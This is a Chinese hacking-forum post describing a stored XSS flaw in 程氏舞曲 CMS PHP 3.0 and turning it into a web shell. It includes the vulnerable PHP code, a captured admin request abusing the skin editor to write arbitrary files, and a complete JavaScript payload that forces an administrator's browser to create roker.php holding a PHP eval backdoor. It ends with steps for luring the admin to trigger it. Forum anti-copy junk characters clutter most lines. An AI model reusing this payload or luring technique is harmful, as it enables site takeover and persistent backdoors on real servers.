中国网络渗透测试联盟

标题: 程氏舞曲CMSPHP3.0 储存型xss getshell [打印本页]
作者: admin    时间: 2013-11-6 18:09
标题: 程氏舞曲CMSPHP3.0 储存型xss getshell
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题
! }  t/ h/ _& Y& U6 s; i0 l' J官网已经修补了,所以重新下了源码* W4 ?+ i& K9 B6 F; j/ ~' M
因为 后台登入 还需要认证码 所以 注入就没看了。
9 M: T, k3 D- B% X! u2 \. n存在 xss
3 y* ~2 H' u+ ]漏洞文件 user/member/skin_edit.php) W2 W0 w- B. j& c- d# ^
本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:$ g8 {. ]0 C. z
  
6 [6 y" a' q# [5 [4 v</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
$ f1 |( r$ d" `6 Y  
( W7 z6 C9 u" _- G</textarea></td></tr>
& l1 O1 `  L: c/ y( g6 R  6 X8 d) e7 X( H- R9 r5 g
             user/do.php 9 B$ e% a9 C1 _1 ?  d' L: d

4 Y. X! ]: e. P6 B: _$ ]0 [7 o" H- l3 i$ W/ X! }
if($op=='zl'){ //资料0 l% D( m! ]# n6 i0 l6 r5 K4 @: b
  + D" w3 y2 o3 q4 Z! H. d9 O
             if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
% q) k" Y3 T* K3 |$ S9 X8 d7 l             exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));' J& t, V& I7 y  H3 C5 k( w& K$ Z
  
2 ]- L1 X5 w5 X0 q+ R$ ^             $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',1 `9 U& q$ }; Q* V- T5 x
  & p( ]. M: Y9 F1 k
             CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'+ G# \; s. v  y0 [" g
             where CS_Name='".$cscms_name."'";, j* M" D6 E8 R9 x3 ]1 M* L
  6 \1 q6 j% ]* G) \$ l/ K
             if($db->query($sql)){3 q" W; o5 Z4 _3 l! g
  ( ~& G. M5 m; C1 ?, v+ Z$ t, ]
              exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
/ C* _! n! w+ v+ e$ V  * x1 p0 H) i0 k; i! F: {8 y+ h( Z8 ?
             }else{
- v6 i& K3 Q2 x' J' q  
0 U& O+ E# y+ W9 X              exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));$ G. P# S. s+ w- m6 }4 z8 d
  ! j+ `$ G8 S6 _- m4 {0 I! U1 U
             }0 g7 \- l3 q# ]+ o: a3 z
. y# `4 o- w8 V0 D

3 A, J1 C% A) ^: N* m. o没有 过滤导致xss产生。, V) z6 e1 O$ Z* g' e/ ]. o
后台 看了下 很奇葩的是可以写任意格式文件。。
, f4 K' W8 K. w" v8 v$ T7 r1 A抓包。。3 S( ]- R, o+ D) c: \9 s

' }0 C3 h7 y& u' V2 o, C: B2 R0 U% Y+ Q4 U
本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.11 B8 ~+ k# ^; z8 l: l9 Y, V
  ! E1 ?% {; a) t2 R, H
Accept: text/html, application/xhtml+xml, */*+ d6 P! u$ Y- p
  0 R6 z' i% r- u6 T! ?
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php% C& L. c% f) p. P, a; z5 }1 D; {, j
  - Q% V1 G: P, @. i& t
Accept-Language: zh-CN
1 n- O4 r- ^$ Z+ M' y$ J# H2 V  
" H( h% c5 S  |1 aUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
8 I# {8 \* O0 ]5 R0 ?( K  
. e5 }" P. {8 n" p3 ~6 K* h" ~4 h0 CContent-Type: application/x-www-form-urlencoded
, w* e! \! H" d: P) U* b  
1 P& j" |* d, S. V: p' YAccept-Encoding: gzip, deflate7 ]1 K" D! n* s: r% L: A
  
: N3 I! f0 w& }Host: 127.0.0.1, H% B! w" s2 B( N4 q
  2 n; x- G3 n4 J8 f2 u
Content-Length: 388 B- |7 v' O9 M9 F$ i4 p. {" m
  
+ g4 Z* m) j- A) T% t% o+ TDNT: 1
$ u, ~$ |8 E7 w! M6 o/ m7 V  8 b4 T" V5 E: F* ?
Connection: Keep-Alive# w6 R0 v3 Z& @, c! |5 R; d) L( p
  
: M6 Y) Q8 n* \7 ]# E2 h( ICache-Control: no-cache
  ~+ D: P6 ~8 @' }9 L  
6 D. Q# a" T3 J6 T" CCookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
. \6 U% H4 e- s) Q  3 L$ H8 X) A4 y# G: ?9 ~

0 v+ C' X) T0 M- B8 O' c0 rname=aaa.php&content=%3Cs%3E%3Ca%25%3E2 T- i) C4 i9 r' O. K5 _' |

9 s0 _4 c! A6 M' ]: h. M
; G/ z4 T. k& R1 b1 ^3 ^$ {* |+ x9 R7 q" S2 W, Q# D
于是 构造js如下。
0 l- R0 l2 \- d1 }+ [2 \: S
7 {/ g0 q) x$ c# r$ c本帖隐藏的内容<script> ( a( _" f5 i5 {% O& L- h, o
thisTHost = top.location.hostname;
# k$ H; a  z# x* m# u) e  1 \" n  L& [& a5 @  y( {
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
2 j* O0 ]  S9 \  
- H5 Z& E- A. B( z. F, X0 M$ yfunction PostSubmit(url, data, msg) {
4 o, X' I8 o8 H2 M2 q" j    var postUrl = url;' M( M$ A, u8 r- o
  
4 C5 y) P' h4 t8 }    var postData = data;
  T1 Z8 c( Y6 ^* i    var msgData = msg; ; }0 k4 ?1 G+ y7 T: z
    var ExportForm = document.createElement("FORM"); : Z( H  Y! D8 U8 q' B3 ?8 k: O; U. e
    document.body.appendChild(ExportForm); % V0 ?8 l( l* Y+ Y& P. E# N
    ExportForm.method = "POST";
4 F" w+ J4 X1 I) r. k* M    var newElement = document.createElement("input"); 1 @) U: i% C4 v8 ^$ M. Y
    newElement.setAttribute("name", "name");
/ _, m, B# i( y7 c# s    newElement.setAttribute("type", "hidden");
9 w2 j! K- h3 U% x' }* G    var newElement2 = document.createElement("input");
! J  m1 D$ Z/ a8 l4 J3 f- \8 x. w    newElement2.setAttribute("name", "content");
* n! n+ T; @- b    newElement2.setAttribute("type", "hidden");
* q- y* U% |: d) o! c$ J+ L    ExportForm.appendChild(newElement); 0 `3 O8 p" r0 R, p4 g) g
    ExportForm.appendChild(newElement2);
7 V% Q$ X% \. m* W    newElement.value = postData;
% {) R$ n" k# `( f% t    newElement2.value = msgData;
. `' }9 g& a$ l  ?$ M    ExportForm.action = postUrl;
$ s) p5 H) V8 G+ p    ExportForm.submit(); % [9 g$ R" v2 w
};
9 T5 w. o2 T4 w  
9 C; _) x% x7 ~$ ~- ]+ {! [" Z  ~& B2 JPostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
; r- {4 V/ l/ A) k; c% o# K5 x' t  7 Q" f( P. s0 [% t7 i) H
</script>
0 R1 Y( U/ r$ _9 L4 l% s
4 L1 S) d, C# O" ], q8 x+ E8 _& \; A! L
* U, Z- \2 K4 i& L
http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入8 b3 n" ~% {  b! @
用你的账号给管理写个 私信 或者让他访问  你的主页http://127.0.0.1/home/?uid=2(uid自己改)$ y: f/ Z$ Y7 j
就会 在 skins\index\html\目录下生成 roker.php 一句话。
1 F0 ~* ~0 R  D2 W" f2 q5 G6 l




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2